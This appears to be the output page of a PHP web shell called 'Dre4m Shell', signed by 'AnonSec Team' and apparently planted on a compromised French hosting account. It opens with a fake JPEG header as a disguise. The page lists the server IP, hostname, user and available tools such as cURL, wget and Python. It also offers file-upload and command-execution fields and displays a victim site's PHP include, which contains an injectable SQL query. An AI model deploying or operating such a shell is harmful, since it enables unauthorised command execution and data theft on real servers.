ÿØÿàJFIF``ÿþxØ Dre4m Was Here
Dre4m Shell
Server IP : 109.234.164.53  /  Your IP : 216.73.216.110
Web Server : Apache
System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64
User : computer3 ( 1098)
PHP Version : 7.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/computer3/litsolide.com/cp-admin/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/computer3/litsolide.com/cp-admin/includes/volet.php
<?php

if($act_aide >0){
/**** Volet ****/
	$sqlv = "SELECT * FROM ".$GLOBALS['db_table']['volet']." WHERE id_volet='".$id_volet."'";
	$resultv = $GLOBALS['bdd']->query($sqlv);
	$aide = $resultv->fetchAll();
    $aideT = $aide[0]['text'];

$couleur_fond_volet= "#333";
$couleur_fond_titre= "#222";
$couleur_volet_ouverture_non_connecte= "#99CC33";
$couleur_volet_referme = "#F60";
?>
<div id="volet_clos" style="top:50px">
		<div id="volet" style="background:<?php echo$couleur_fond_volet ?>;border-radius:0 20px 8px 0;">    
<p style="text-align: left;background:<?php echo$couleur_fond_titre ?>;padding:6px;font-size:14pt;padding-top:10px;padding-bottom:22px;border-radius: 0 20px 0 0;font-weight: bold;padding-left:20px">> Aide et conseils</p> 
<div style="border:0px solid #ccc;text-align:left;padding-left:10px; padding-right:10px;color:#fff;margin-top: -10px;padding-top:10px;padding-bottom:20px;height:500px;background:#444;font-size;10pt;overflow: auto;">  
<div class="mon_volet"><?php echo$aideT ?></div>
</div>
<br />			
			<a href="#volet" class="ouvrir" style="background:transparent;color:<?php echo$couleur_volet_ouverture_non_connecte ?>;font-size:30pt;"><i class="icon-comment"></i></a>
			<a href="#volet_clos" class="fermer" style="background:<?php echo$couleur_volet_referme ?>;">X</a>      
		</div>
	</div>
<?php
} else { 
}
?>

Anon7 - 2022
AnonSec Team